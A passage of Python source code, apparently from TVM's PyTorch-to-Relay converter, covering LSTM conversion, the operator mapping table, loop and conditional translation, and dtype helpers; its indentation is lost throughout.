# split input sequence to samples set
input_seqs = unbind(input_data, 0) # [seq_num, (batch, feature_size)]
output_hiddens = []
for i in range(layers_num):
weights_dicts = layer_weights_dicts[i]
# input_seqs shape = [seq_num, (batch, feature_size)] or
# [seq_num, (batch, 2*feature_size)] for bidirectional
if bidirectional:
input_seqs, H_t, C_t = self.bidir_lstm_cell(input_seqs, weights_dicts)
else:
input_seqs, H_t, C_t = lstm_cell(input_seqs, **weights_dicts[0])
output_hiddens.append((H_t, C_t))
# TODO (vvchernov): in pytorch implementation train is also checked
# see https://github.com/pytorch/pytorch/blob/70c8daf43946b53af6493d058899ef952d27d339
# /aten/src/ATen/native/RNN.cpp#L1054
if dropout_p != 0 and i < layers_num - 1:
# for input in input_seqs:
# input = _op.dropout(input, dropout_p)
raise NotImplementedError("Dropout for LSTM has not been supported yet!")
final_hiddens = []
if bidirectional:
for output_hidden in output_hiddens:
final_hiddens.append(output_hidden[0])
final_hiddens.append(output_hidden[1])
else:
final_hiddens = output_hiddens
return _op.stack(input_seqs, 0), final_hiddens
def lstm(self, inputs, input_types):
"""
Description of LSTM in pytorch:https://pytorch.org/docs/stable/generated/torch.nn.LSTM.html
Native implementation for torch version less than 1.8.0 (projection is unsupported):
https://github.com/pytorch/pytorch/blob/70c8daf43946b53af6493d058899ef952d27d339/aten/ \
src/ATen/native/RNN.cpp#L1396
Native implementation for torch version from 1.8.0 and higher (projection is supported):
https://github.com/pytorch/pytorch/blob/master/aten/src/ATen/native/RNN.cpp#L1483
"""
# TODO (vvchernov): support dropout
assert len(inputs) == 9, "Input of size 9 is expected"
# Unpack inputs, note that if optional and not provided then value will be None.
_X = inputs[0]
# _X shape (seq_num, batch, feature_size) or (batch, seq_num, feature_size)
hidden_states = inputs[1]
assert len(hidden_states) == 2, "lstm expects two hidden states"
h_0 = hidden_states[0]
c_0 = hidden_states[1]
# H0 shape (hidden_layers_num, batch, proj_size) if projection
# else (hidden_layers_num, batch, hidden_size)
# C0 shape (hidden_layers_num, batch, hidden_size)
_weights = inputs[2]
# If no projection
# Wi layer[0] shape (4 * hidden_size, feature_size)
# Wh layer[0] shape (4 * hidden_size, hidden_size)
# Bi layer[0] shape (4 * hidden_size)
# Bh layer[0] shape (4 * hidden_size)
# Wi layer[>0] shape (4 * hidden_size, hidden_size * num_directions)
# Wh layer[>0] shape (4 * hidden_size, hidden_size)
# Bi layer[>0] shape (4 * hidden_size)
# Bh layer[>0] shape (4 * hidden_size)
# If projection
# Wi layer[0] shape (4 * hidden_size, feature_size)
# Wh layer[0] shape (4 * hidden_size, proj_size)
# Bi layer[0] shape (4 * hidden_size)
# Bh layer[0] shape (4 * hidden_size)
# P layer[0] shape (proj_size, hidden_size)
# Wi layer[>0] shape (4 * hidden_size, proj_size * num_directions)
# Wh layer[>0] shape (4 * hidden_size, proj_size)
# Bi layer[>0] shape (4 * hidden_size)
# Bh layer[>0] shape (4 * hidden_size)
# P layer[>0] shape (proj_size, hidden_size)
# Scalar inputs
has_biases = inputs[3]
num_layers = inputs[4]
dropout_p = inputs[5] # dropout probability, if 0.0 it means there is no dropout
# train = inputs[6]
bidirectional = inputs[7]
batch_first = inputs[8]
num_directions = 1
if bidirectional:
num_directions = 2
rsd = len(_weights) % num_layers
assert rsd == 0, "The number of weights must be a multiple of the number of layers!"
rsd = (len(_weights) / num_layers) % num_directions
assert (
rsd == 0
), "The number of weights in layer must be a multiple of the number of directions!"
has_proj = False
proj_size = 0
weights_num = int(len(_weights) / num_layers / num_directions)
if has_biases:
if weights_num == 5:
has_proj = True
proj_size = _infer_shape(_weights[4])[0]
else:
assert weights_num == 4, "The weights number in layer is expected equal to 4"
else:
if weights_num == 3:
has_proj = True
proj_size = _infer_shape(_weights[2])[0]
else:
assert weights_num == 2, "The weights number in layer is expected equal to 2"
X = _op.transpose(_X, (1, 0, 2)) if batch_first else _X
# TODO (vvchernov): Which data type should be used? from input or weights?
# Instead of it _infer_type(X).checked_type.dtype can be used
X_dtype = input_types[0]
X_shape = _infer_shape(X) # (seq_num, batch, feature_size)
hidden_size = _infer_shape(_weights[0])[0] / 4
batch_size = X_shape[1]
# Initialize hidden states if not provided.
layers_h = []
layers_c = []
hidden_layers_num = num_directions * num_layers
if h_0 is None:
if has_proj:
h_0 = _op.zeros((batch_size, proj_size), X_dtype)
else:
h_0 = _op.zeros((batch_size, hidden_size), X_dtype)
for i in range(hidden_layers_num):
layers_h.append(h_0)
else:
layers_h = unbind(h_0, 0)
if c_0 is None:
c_0 = _op.zeros((batch_size, hidden_size), X_dtype)
for i in range(hidden_layers_num):
layers_c.append(c_0)
else:
layers_c = unbind(c_0, 0)
layer_weights_dicts = []
k = 0 # layer counter
if has_biases:
names = ["hidden_state", "cell_state", "w_inp", "w_hid", "b_inp", "b_hid"]
if bidirectional:
rsd = len(_weights) % (2 * weights_num)
assert rsd == 0, "got an incorrect number of LSTM weights"
for i in range(0, len(_weights), 2 * weights_num):
fw_tensors = [layers_h[2 * k], layers_c[2 * k], *_weights[i : i + 4]]
fw_weights_dict = dict(zip(names, fw_tensors))
if has_proj:
fw_weights_dict["proj"] = _weights[i + 4]
j = i + weights_num
rev_tensors = [layers_h[2 * k + 1], layers_c[2 * k + 1], *_weights[j : j + 4]]
rev_weights_dict = dict(zip(names, rev_tensors))
if has_proj:
rev_weights_dict["proj"] = _weights[j + 4]
layer_weights_dicts.append([fw_weights_dict, rev_weights_dict])
k += 1
else:
assert len(_weights) % weights_num == 0, "got an incorrect number of LSTM weights"
for i in range(0, len(_weights), weights_num):
fw_tensors = [layers_h[k], layers_c[k], *_weights[i : i + 4]]
fw_weights_dict = dict(zip(names, fw_tensors))
if has_proj:
fw_weights_dict["proj"] = _weights[i + 4]
layer_weights_dicts.append([fw_weights_dict])
k += 1
else:
names = ["hidden_state", "cell_state", "w_inp", "w_hid"]
if bidirectional:
rsd = len(_weights) % (2 * weights_num)
assert rsd == 0, "got an incorrect number of LSTM weights"
for i in range(0, len(_weights), 2 * weights_num):
fw_tensors = [layers_h[2 * k], layers_c[2 * k], *_weights[i : i + 2]]
fw_weights_dict = dict(zip(names, fw_tensors))
if has_proj:
fw_weights_dict["proj"] = _weights[i + 2]
j = i + weights_num
rev_tensors = [layers_h[2 * k + 1], layers_c[2 * k + 1], *_weights[j : j + 2]]
rev_weights_dict = dict(zip(names, rev_tensors))
if has_proj:
rev_weights_dict["proj"] = _weights[j + 2]
layer_weights_dicts.append([fw_weights_dict, rev_weights_dict])
k += 1
else:
assert len(_weights) % weights_num == 0, "got an incorrect number of LSTM weights"
for i in range(0, len(_weights), weights_num):
fw_tensors = [layers_h[k], layers_c[k], *_weights[i : i + 2]]
fw_weights_dict = dict(zip(names, fw_tensors))
if has_proj:
fw_weights_dict["proj"] = _weights[i + 2]
layer_weights_dicts.append([fw_weights_dict])
k += 1
assert (
len(layer_weights_dicts) == num_layers and k == num_layers
), "For stacked LSTM number of weights sets should be the same as number of layers!"
outputs = self.lstm_layers(
X,
layer_weights_dicts,
bidirectional,
dtype=X_dtype,
dropout_p=dropout_p,
)
# output shape = (seq_num, batch, hidden_size) or
# (seq_num, batch, 2*feature_size) for bidirectional
output = outputs[0]
hy = []
cy = []
for hidden in outputs[1]:
hy.append(hidden[0])
cy.append(hidden[1])
if batch_first:
output = _op.transpose(output, (1, 0, 2))
return (output, _op.stack(hy, 0), _op.stack(cy, 0))
def all_any_common(self, op, inputs, input_types):
dim = inputs[1]
keepdim = inputs[2]
if self.infer_type(inputs[0]).dtype != "bool":
# The input dtype can be uint8.
inp = _op.cast(inputs[0], "bool")
else:
inp = inputs[0]
return op(inp, axis=dim, keepdims=keepdim)
def searchsorted_common(self, sorted_sequence, values, out_int32, right):
dtype = "int32" if out_int32 else "int64"
values_shape = _infer_shape(values)
if len(values_shape) == 0:
values = _op.expand_dims(values, 0)
out = _op.searchsorted(sorted_sequence, values, right=right, dtype=dtype)
if len(values_shape) == 0:
return _op.squeeze(out)
return out
def searchsorted(self, inputs, input_types):
return self.searchsorted_common(*inputs)
def bucketize(self, inputs, input_types):
return self.searchsorted_common(inputs[1], inputs[0], inputs[2], inputs[3])
def roll(self, inputs, input_types):
def slide_axes(inp, shape, ax):
axes = list(range(len(shape)))
axes = axes[:ax] + [-1] + axes[ax:-1]
return _op.transpose(inp, axes)
x = inputs[0]
shifts = inputs[1]
dims = inputs[2]
shape = self.infer_shape(x)
start = _expr.const(0, "int64")
step = _expr.const(1, "int64")
out = x
for i, dim in enumerate(dims):
roll_dim = _expr.const(shape[dim], "int64")
indices_1d = _op.mod(
_op.transform.arange(start, roll_dim, step, "int64")
- _expr.const(shifts[i], "int64")
+ roll_dim,
roll_dim,
)
# First fill in the last axis with roll indices, and then do transpose to
# bring the roll indices into the desired axis.
indices = slide_axes(
_op.tile(indices_1d, shape[:dim] + shape[dim + 1 :] + (1,)),
shape,
dim,
)
out = _op.gather(out, dim, indices)
return out
# Operator mappings
def create_convert_map(self):
self.convert_map = {
"aten::is_floating_point": self.is_floating_point,
"aten::pixel_shuffle": self.pixel_shuffle,
"aten::device": self.none,
"prim::device": self.none,
"aten::sub": self.make_elemwise("subtract"),
"aten::sub_": self.make_elemwise("subtract"),
"aten::max": self.max,
"aten::min": self.min,
"aten::mul": self.make_elemwise("multiply"),
"aten::mul_": self.make_elemwise("multiply"),
"aten::pow": self.make_elemwise("power"),
"aten::arange": self.arange,
"aten::meshgrid": self.meshgrid,
"aten::div": self.make_elemwise("divide"),
"aten::div_": self.make_elemwise("divide"),
"aten::floor_divide": self.make_elemwise("floor_divide"),
"aten::floor_divide_": self.make_elemwise("floor_divide"),
"aten::true_divide": self.make_elemwise("divide"),
"aten::addcdiv": self.addcdiv,
"aten::addcmul": self.addcmul,
"aten::ones": self.ones,
"aten::ones_like": self.ones_like,
"aten::zeros": self.zeros,
"aten::zeros_like": self.zeros_like,
"aten::full": self.full,
"aten::full_like": self.full_like,
"aten::linspace": self.linspace,
"aten::reciprocal": self.reciprocal,
"aten::repeat": self.repeat,
"aten::repeat_interleave": self.repeat_interleave,
"aten::to": self.to,
"aten::squeeze": self.squeeze,
"aten::unsqueeze": self.unsqueeze,
"aten::unsqueeze_": self.unsqueeze,
"aten::cat": self.concatenate,
"aten::slice": self.slice,
"aten::narrow": self.narrow,
"aten::split": self.split,
"aten::split_with_sizes": self.split_with_sizes,
"aten::select": self.select,
"aten::take": self.take,
"aten::where": self.where,
"aten::topk": self.topk,
"aten::relu": self.relu,
"aten::relu_": self.relu,
"aten::prelu": self.prelu,
"aten::leaky_relu": self.leaky_relu,
"aten::leaky_relu_": self.leaky_relu,
"aten::elu": self.elu,
"aten::elu_": self.elu,
"aten::celu": self.celu,
"aten::gelu": self.gelu,
"aten::selu": self.selu,
"aten::silu": self.silu,
"aten::silu_": self.silu,
"aten::log_sigmoid": self.log_sigmoid,
"aten::adaptive_avg_pool1d": functools.partial(
self.adaptive_avg_pool, _op.nn.adaptive_avg_pool1d
),
"aten::adaptive_avg_pool2d": functools.partial(
self.adaptive_avg_pool, _op.nn.adaptive_avg_pool2d
),
"aten::adaptive_avg_pool3d": functools.partial(
self.adaptive_avg_pool, _op.nn.adaptive_avg_pool3d
),
"aten::adaptive_max_pool1d": functools.partial(
self.adaptive_max_pool, _op.nn.adaptive_max_pool1d
),
"aten::adaptive_max_pool2d": functools.partial(
self.adaptive_max_pool, _op.nn.adaptive_max_pool2d
),
"aten::adaptive_max_pool3d": functools.partial(
self.adaptive_max_pool, _op.nn.adaptive_max_pool3d
),
"aten::max_pool2d": self.maxpool_2d,
"aten::max_pool2d_with_indices": self.maxpool_2d_with_indices,
"aten::max_pool1d": self.maxpool_1d,
"aten::max_pool3d": self.maxpool_3d,
"aten::hardtanh": self.hardtanh,
"aten::hardtanh_": self.hardtanh,
"aten::_convolution": self.convolution,
"aten::softmax": self.softmax,
"aten::threshold": self.threshold,
"aten::threshold_": self.threshold,
"aten::contiguous": self.contiguous,
"aten::batch_norm": self.batch_norm,
"aten::instance_norm": self.instance_norm,
"aten::layer_norm": self.layer_norm,
"aten::group_norm": self.group_norm,
"aten::transpose": self.transpose,
"aten::transpose_": self.transpose,
"aten::t": self.transpose,
"aten::flatten": self.flatten,
"aten::addmm": self.addmm,
"aten::size": self.size,
"aten::view": self.view,
"aten::reshape": self.reshape,
"aten::clone": self.clone,
"aten::log_softmax": self.log_softmax,
"aten::sigmoid": self.sigmoid,
"aten::sigmoid_": self.sigmoid,
"aten::softplus": self.softplus,
"aten::avg_pool1d": self.make_avg_pool(1),
"aten::avg_pool2d": self.make_avg_pool(2),
"aten::avg_pool3d": self.make_avg_pool(3),
"aten::linear": self.linear,
"aten::dropout": self.dropout,
"aten::dropout_": self.dropout,
"aten::feature_dropout": self.dropout,
"aten::alpha_dropout": self.dropout,
"aten::mean": self.mean,
"aten::chunk": self.chunk,
"aten::unsafe_chunk": self.chunk,
"aten::matmul": self.matmul,
"aten::bmm": self.matmul,
"aten::expand": self.expand,
"aten::Int": self.int,
"prim::NumToTensor": self.numtotensor,
"prim::ImplicitTensorToNum": self.tensortonum,
"aten::ScalarImplicit": self.tensortonum,
"aten::constant_pad_nd": self.make_pad("constant"),
"aten::reflection_pad1d": self.make_pad("reflect"),
"aten::reflection_pad2d": self.make_pad("reflect"),
"aten::replication_pad1d": self.make_pad("edge"),
"aten::replication_pad2d": self.make_pad("edge"),
"aten::replication_pad3d": self.make_pad("edge"),
"aten::permute": self.transpose,
"aten::sum": self.make_reduce("sum"),
"aten::prod": self.make_reduce("prod"),
"aten::argmin": self.make_reduce("argmin"),
"aten::argmax": self.make_reduce("argmax"),
"aten::norm": self.norm,
"aten::frobenius_norm": self.frobenius_norm,
"aten::std": self.std,
"aten::var": self.variance,
"aten::abs": self.make_unary("abs"),
"aten::neg": self.make_unary("negative"),
"aten::cos": self.make_unary("cos"),
"aten::cosh": self.make_unary("cosh"),
"aten::sin": self.make_unary("sin"),
"aten::sinh": self.make_unary("sinh"),
"aten::tan": self.make_unary("tan"),
"aten::tanh": self.make_unary("tanh"),
"aten::tanh_": self.make_unary("tanh"),
"aten::acos": self.make_unary("acos"),
"aten::asin": self.make_unary("asin"),
"aten::atan": self.make_unary("atan"),
"aten::log": self.make_unary("log"),
"aten::log2": self.make_unary("log2"),
"aten::log10": self.make_unary("log10"),
"aten::log1p": self.log1p,
"aten::exp": self.make_unary("exp"),
"aten::erf": self.make_unary("erf"),
"aten::trunc": self.make_unary("trunc"),
"aten::sign": self.make_unary("sign"),
"aten::sqrt": self.make_unary("sqrt"),
"aten::rsqrt": self.make_unary("rsqrt"),
"aten::ceil": self.make_unary("ceil"),
"aten::floor": self.make_unary("floor"),
"aten::floor_": self.make_unary("floor"),
"aten::round": self.make_unary("round"),
"aten::isfinite": self.make_unary("isfinite"),
"aten::isinf": self.make_unary("isinf"),
"aten::isnan": self.make_unary("isnan"),
"aten::clamp": self.clamp,
"aten::clamp_": self.clamp,
"aten::detach": self.identity,
"aten::upsample_bilinear2d": self.make_upsample("linear"),
"aten::upsample_bicubic2d": self.make_upsample("cubic"),
"aten::upsample_nearest2d": self.make_upsample("nearest_neighbor"),
"aten::upsample_trilinear3d": self.make_upsample3d("linear"),
"aten::upsample_nearest3d": self.make_upsample3d("nearest_neighbor"),
"aten::expand_as": self.expand_as,
"aten::lt": self.make_elemwise("less"),
"aten::gt": self.make_elemwise("greater"),
"aten::le": self.make_elemwise("less_equal"),
"aten::ge": self.make_elemwise("greater_equal"),
"aten::ne": self.make_elemwise("not_equal"),
"aten::eq": self.make_elemwise("equal"),
"aten::logical_not": self.logical_not,
"aten::logical_xor": self.logical_xor,
"aten::bitwise_not": self.bitwise_not,
"aten::bitwise_xor": self.bitwise_xor,
"aten::Bool": self.Bool,
"aten::Float": self.Float,
"aten::rsub": self.rsub,
"aten::embedding": self.embedding,
"aten::one_hot": self.one_hot,
"aten::mm": self.matmul,
"aten::add": self.add,
"aten::add_": self.add,
"aten::stack": self.stack,
"aten::__getitem__": self.list_getitem,
"aten::len": self.list_len,
"aten::type_as": self.type_as,
"aten::gather": self.gather,
"aten::index_select": self.select,
"aten::index": self.index,
"torchvision::nms": self.nms,
"aten::logsumexp": self.logsumexp,
"torchvision::roi_align": self.roi_align,
"torchvision::deform_conv2d": self.deform_conv2d,
"aten::unbind": self.unbind,
"aten::__and__": self.logical_and,
"aten::logical_and": self.logical_and,
"aten::_shape_as_tensor": self.shape_as_tensor,
"aten::nonzero": self.nonzero,
"aten::nonzero_numpy": self.nonzero_numpy,
"aten::scatter": self.scatter,
"aten::index_put": self.index_put,
"aten::index_put_": self.index_put,
"aten::scalar_tensor": self.scalar_tensor,
"aten::__interpolate": self.interpolate,
"aten::IntImplicit": self.identity,
"aten::tensor": self.identity, # used for example in tensor(1.0)
"aten::numel": self.numel,
"aten::empty": self.empty,
"aten::bincount": self.bincount,
"aten::scatter_add": self.scatter_add,
"aten::__not__": self.logical_not,
"aten::hardswish_": self.hard_swish,
"aten::hardswish": self.hard_swish,
"aten::hardsigmoid_": self.hard_sigmoid,
"aten::hardsigmoid": self.hard_sigmoid,
"aten::cumsum": self.cumsum,
"aten::masked_fill": self.masked_fill,
"aten::masked_fill_": self.masked_fill,
"aten::masked_select": self.masked_select,
"aten::argsort": self.argsort,
"aten::sort": self.sort,
"aten::_unique2": self.unique,
"aten::nll_loss": self.nll_loss,
"aten::nll_loss2d": self.nll_loss,
"aten::flip": self.flip,
"aten::gru": self.gru,
"aten::lstm": self.lstm,
"aten::all": functools.partial(self.all_any_common, _op.all),
"aten::any": functools.partial(self.all_any_common, _op.any),
"aten::searchsorted": self.searchsorted,
"aten::bucketize": self.bucketize,
"aten::roll": self.roll,
}
def update_convert_map(self, custom_map):
self.convert_map.update(custom_map)
def report_missing_conversion(self, op_names):
"""Check if all ops in an input graph are supported by TVM"""
known_ops = [
"prim::Constant",
"prim::GetAttr",
"prim::ListConstruct",
"prim::ListUnpack",
"prim::TupleConstruct",
"prim::TupleUnpack",
"prim::RaiseException",
"prim::If",
"prim::Loop",
]
known_ops += list(self.convert_map.keys())
known_ops += list(qnn_torch.convert_map.keys())
missing = [op_name for op_name in op_names if op_name not in known_ops]
if missing:
msg = "The following operators are not implemented: {}".format(missing)
raise NotImplementedError(msg)
def convert_block(self, block, outputs):
"""Translate Torch "Block", used for prim::If and prim::Loop"""
ops = _get_operator_nodes(block.nodes())
ret_names = _get_input_names(block.returnNode())
return self.convert_operators(ops, outputs, ret_names)
def convert_if(self, if_node, outputs):
"""Translate Torch prim::If to Relay If"""
cond = outputs[if_node.inputsAt(0).debugName()]
blocks = list(if_node.blocks())
true_branch = self.convert_block(blocks[0], outputs)
false_branch = self.convert_block(blocks[1], outputs)
assert len(true_branch) == 1 and len(false_branch) == 1
return _expr.If(cond, true_branch[0], false_branch[0])
def convert_loop(self, loop_node, outputs):
"""Translate Torch prim::Loop to Relay while_loop"""
def get_input(index):
ivalue = loop_node.inputsAt(index)
inode = ivalue.node()
if inode.kind() == "prim::Constant":
return _expr.const(_get_constant(inode))
var_name = ivalue.debugName()
assert var_name in outputs
return _wrap_const(outputs[var_name])
# Refer to the spec for prim::Loop below
# https://github.com/pytorch/pytorch/blob/master/torch/csrc/jit/OVERVIEW.md#loops
# The first input: %max_trip_count
# The second input: %initial_condition
# The rest of input: loop variables
max_loop_count = get_input(0)
init_cond = get_input(1)
num_loop_var = len(list(loop_node.inputs())) - 2
init_vals = [get_input(i + 2) for i in range(num_loop_var)]
# while loop has always max_loop_count being int64 max
# max_loop_count.data (tvm.runtime.NDArray) is -1, so _get_constant again
is_while_loop = (
isinstance(max_loop_count, _expr.Constant)
and _get_constant(loop_node.inputsAt(0).node()) == sys.maxsize
)
if is_while_loop:
loop_iter_dtype = "bool"
# while loop with non input dependent condition such as while i < 10:
# init_cond is int, need to cast to bool to type check
if isinstance(init_cond, _expr.Constant):
init_cond = _op.cast(init_cond, "bool")
init_loop_iter_val = init_cond
else:
loop_iter_dtype = "int32"
# always count from 0
init_loop_iter_val = _expr.const(0, dtype="int32")
body_block = list(loop_node.blocks())[0]
block_input_names = _get_input_names(body_block)
num_block_inputs = len(block_input_names)
name_val_pairs = list(zip(block_input_names, [init_loop_iter_val] + init_vals))
outputs.update(name_val_pairs)
def get_var(name, val):
if val:
checked_type = self.infer_type_with_prelude(val)
if hasattr(checked_type, "shape"):
shape = get_const_tuple(checked_type.shape)
actual_shape = []
for dim in shape:
if isinstance(dim, int) and dim == 0:
actual_shape.append(Any())
else:
actual_shape.append(dim)
return _expr.var(name, shape=actual_shape, dtype=checked_type.dtype)
else:
return _expr.var(name, type_annotation=checked_type)
return _expr.var(name)
loop_iter_var = _expr.var(block_input_names[0], shape=(), dtype=loop_iter_dtype)
loop_vars = [get_var(name, val) for name, val in name_val_pairs[1:]]
# Add non constant free variables to loop variables to prevent code blow up
# Without this, if there are two for loops in a row, which often happens
# if the outer loop is unrolled, the computation corresponding to the first for loop
# is inlined inside loop body, turning O(N) + O(N) computation into O(N^2).
# This issue was found when converting from Stacked LSTM test. Torch does not add the
# outputof the eariler loop into loop variables of the next loop.
# So the variable corresponding to the first loop output appears free in the second
# loop body.
free_vars = [
var
for var in _get_free_vars_from_block(body_block)
if var in outputs
and not isinstance(outputs[var], (_expr.Constant, int, float, str))
and outputs[var]
]
prev_outputs = {}
for name in free_vars:
prev_output = outputs[name]
new_loop_var = get_var(name, prev_output)
prev_outputs[name] = prev_output
outputs[name] = new_loop_var
loop_vars.append(new_loop_var)
init_vals.append(prev_output)
def cond(*current_vals):
i = current_vals[0]
if is_while_loop:
return _op.equal(i, _expr.const(True, "bool"))
return _op.less(i, max_loop_count)
def body(*current_vals):
# Update loop variables using the prev iteration outputs
assert len(current_vals) == num_block_inputs + len(free_vars)
for (i, val) in enumerate(current_vals):
if i < num_block_inputs:
outputs[block_input_names[i]] = val
else:
outputs[free_vars[i - num_block_inputs]] = val
block_outputs = self.convert_block(body_block, outputs)
block_outputs += [outputs[name] for name in free_vars]
if not is_while_loop:
# iter var increment implicit in torch, so do it manually
# for while loop, block_outputs[0] is already a boolean,
# the result of termination check
incr = _expr.const(1, dtype="int32")
block_outputs[0] = current_vals[0] + incr
return block_outputs
loop = while_loop(cond, [loop_iter_var] + loop_vars, body)
loop_val = loop(init_loop_iter_val, *init_vals)
# restore original output values for free vars
outputs.update(prev_outputs)
# The first element is a loop counter or boolean condition, ignore it
return [_expr.TupleGetItem(loop_val, i + 1) for i in range(num_loop_var)]
def convert_operators(self, operators, outputs, ret_names):
"""Convert each Torch IR operators to Relay equivalent"""
# an op node might not belong to any of scope in trace info natively
# use a cunter to prevent from messing up its scope in span
empty_counter = 0
for node_name, op_node in operators:
operator = op_node.kind()
inputs = _get_op_inputs(op_node, outputs)
if operator == "prim::Constant":
outputs[node_name] = _get_constant(op_node)
elif operator == "prim::ListConstruct" and _should_construct_dynamic_list(op_node):
outputs[node_name] = self.convert_to_list_adt(inputs)
elif operator == "prim::ListConstruct":
# This assumes that no more elements will be appended to this list
# In this case, we keep the Python list
outputs[node_name] = inputs
elif operator == "prim::TupleConstruct":
outputs[node_name] = _expr.Tuple(inputs)
elif operator in ["prim::ListUnpack", "prim::TupleUnpack"]:
assert len(inputs) == 1
if isinstance(inputs[0], (list, _expr.TupleWrapper)):
unpacked = inputs[0]
else:
unpacked = _unpack_tuple(inputs[0])
outputs.update(zip(_get_output_names(op_node), unpacked))
elif operator == "prim::prim::RaiseException":
logging.warning("raising exceptions is ignored")
outputs[node_name] = None
elif operator == "prim::If":
if_out = self.convert_if(op_node, outputs)
outputs[node_name] = if_out
elif operator == "prim::Loop":
loop_out = self.convert_loop(op_node, outputs)
unpacked_names = _get_output_names(op_node)
assert len(loop_out) == len(unpacked_names)
outputs.update(zip(unpacked_names, loop_out))
else:
relay_op = self.convert_map[operator]
relay_out = relay_op(
inputs, _get_input_types(op_node, outputs, default_dtype=self.default_dtype)
)
span_str, empty_counter = self._get_torch_span(op_node, empty_counter)
relay_out = set_span(relay_out, span_str)
self.record_output_type(relay_out)
if isinstance(relay_out, tuple):
# This is for torch operators that return multiple outputs
# See _adaptive_max_2d above for example
out_names = _get_output_names(op_node)
outputs.update(zip(out_names, relay_out))
else:
assert op_node.outputsSize() == 1
outputs[node_name] = relay_out
return [_wrap_const(outputs[ret_name]) for ret_name in ret_names]
def _get_torch_span(self, node, empty_counter):
# torch span looks like
# %input.5 : Float(...) = aten::relu_(%input.3), scope: __module.relu # ${torch}/nn file
# the scope part might not exist
if node.scopeName():
scope_name_str = "jit._trace.TopLevelTracedModule: " + node.scopeName()
else:
scope_name_str = "warning: no trace info " + str(empty_counter)
empty_counter += 1
span_str = "C.graph: {}, {}".format(node.kind(), scope_name_str)
return span_str, empty_counter
def _pytorch_result_type(dtypes, non_tensor_inputs):
"""This promotes TVM dtypes like PyTorch would"""
import torch
dtype_map = {
"float64": torch.float64,
"float32": torch.float32,
"float16": torch.float16,
"bfloat16": torch.bfloat16,
"int64": torch.int64,
"int32": torch.int32,
"int16": torch.int16,
"int8": torch.int8,
"uint8": torch.uint8,
"bool": torch.bool,
}
if len(dtypes) > 0:
result_type = dtypes[0]
for dt in dtypes[1:]:
if dt != result_type: # we don't want to work with same types as we
# don't do quantized here (which cannot be promoted?)
result_type = _convert_data_type(
str(
torch.result_type(
torch.zeros((), dtype=dtype_map[result_type]),
torch.zeros((), dtype=dtype_map[dt]),
)
)
)
else:
result_type = "bool" # this is the smallest type...
for inp in non_tensor_inputs:
result_type = _convert_data_type(
str(torch.result_type(torch.zeros((), dtype=dtype_map[result_type]), inp))
)
return result_type
# Helper functions for operator implementation
def _convert_dtype_value(val):
"""converts a PyTorch the PyTorch numeric type id to a torch scalar type."""
convert_torch_dtype_map = {
7: "torch.float64",
6: "torch.float32",
5: "torch.float16",
4: "torch.int64",
3: "torch.int32",
2: "torch.int16",
1: "torch.int8",
0: "torch.unit8",
None: "torch.int64",
} # Default is torch.int64
if val in convert_torch_dtype_map:
return _convert_data_type(convert_torch_dtype_map[val])
else:
msg = "Torch data type value %d is not handled yet." % (val)
raise NotImplementedError(msg)
def _convert_data_type(input_type, default_dtype=None):
"""converts the PyTorch scalar type input_type to a TVM dtype.
optionally, default_dtype can be a TVM dtype that is used
if input_type is None (but not when it is unknown)"""
if input_type is None and default_dtype is not None:
return default_dtype
input_type = input_type.lower()
if input_type in ["double", "float64", "torch.float64"]:
return "float64"
elif input_type in ["float", "float32", "torch.float32"]:
return "float32"
elif input_type in ["half", "float16", "torch.float16"]:
return "float16"
elif input_type in ["long", "int64", "torch.int64"]:
return "int64"
elif input_type in ["int", "int32", "torch.int32"]:
return "int32"
elif input_type in ["short", "int16", "torch.int16"]:
return "int16"
elif input_type in ["char", "int8", "torch.int8"]:
return "int8"
elif input_type in ["byte", "uint8", "torch.uint8"]:
return "uint8"
elif input_type in ["quint8", "torch.quint8"]:
return "quint8"
elif input_type in ["qint8", "torch.qint8"]:
return "qint8"
elif input_type in ["qint32", "torch.qint32"]:
return "qint32"
elif input_type in ["bool", "torch.bool"]:
return "bool"
elif input_type in ["str"]:
return "str"
else:
raise NotImplementedError("input_type {} is not handled yet".format(input_type))
return "float32" # Never reached
def _create_typed_const(data, dtype):
"""create a (scalar) constant of given value and dtype.
dtype should be a TVM dtype"""
if dtype == "float64":
typed_data = _expr.const(np.float64(data), dtype=dtype)
elif dtype == "float32":
typed_data = _expr.const(np.float32(data), dtype=dtype)
elif dtype == "float16":
typed_data = _expr.const(np.float16(data), dtype=dtype)
elif dtype == "int64":
typed_data = _expr.const(np.int64(data), dtype=dtype)
elif dtype == "int32":
typed_data = _expr.const(np.int32(data), dtype=dtype)
elif dtype == "int16":
typed_data = _expr.const(np.int16(data), dtype=dtype)
elif dtype == "int8":
typed_data = _expr.const(np.int8(data), dtype=dtype)
elif dtype == "uint8":
typed_data = _expr.const(np.uint8(data), dtype=dtype)
else:
raise NotImplementedError("input_type {} is not handled yet".format(dtype))
return typed_data
def _wrap_const(c):
if not isinstance(c, (_expr.Expr, list, tvm.tir.expr.Any)):
return _expr.const(c)
return c
def _run_jit_passes(graph):
"""The inline pass is necessary to unwrap prim::CallMethod"""
# pylint: disable=c-extension-no-member
import torch
if is_version_greater_than("1.5.1"):
# This is required for torchvision detection models from 1.6 above
# It is the same as _jit_pass_inline, except that it has some special
# case behaviors for some ops such as aten::__interpolate()
torch._C._jit_pass_onnx_function_substitution(graph)
else:
torch._C._jit_pass_inline(graph)
def _get_tensor_and_var(torch_tensor, name):
tensor = tvm.nd.array(torch_tensor.cpu().numpy())
var = _expr.var(name, shape=tensor.shape, dtype=tensor.dtype)
return tensor, var
def _get_output_name(node):
assert node.outputsSize() == 1
return node.output().debugName()
def _get_output_names(node):
return [output.debugName() for output in node.outputs()]
def _get_input_names(node_or_graph):
return [inp.debugName() for inp in node_or_graph.inputs()]
def _get_op_inputs(op_node, outputs):
return [outputs[name] for name in _get_input_names(op_node)]
def _get_node_type(node):
assert node.outputsSize() == 1
return node.output().type().kind()
def _get_uses(node):
uses = []
for output in node.outputs():
uses += output.uses()
return uses
def _get_users(node):
return [use.user for use in _get_uses(node)]
def _getattr_attr_name(node):
attribute_names = node.attributeNames()
assert len(attribute_names) == 1
attr_name = node.s(attribute_names[0])
return attr_name
def _getattr_full_name(getattrs, sep="."):
return sep.join([_getattr_attr_name(node) for node in getattrs])
def _get_pytorch_value_type(typ, default_dtype="float32"):
kind = typ.kind()
if kind == "TensorType":
if typ.scalarType() is None:
# Tensor's type can be unknown if we use torch.jit.script(...)
# Defaults can be passed in, if not it is float32
logging.warning("Untyped Tensor found, assume it is %s", default_dtype)
return default_dtype
else:
return _convert_data_type(typ.scalarType())
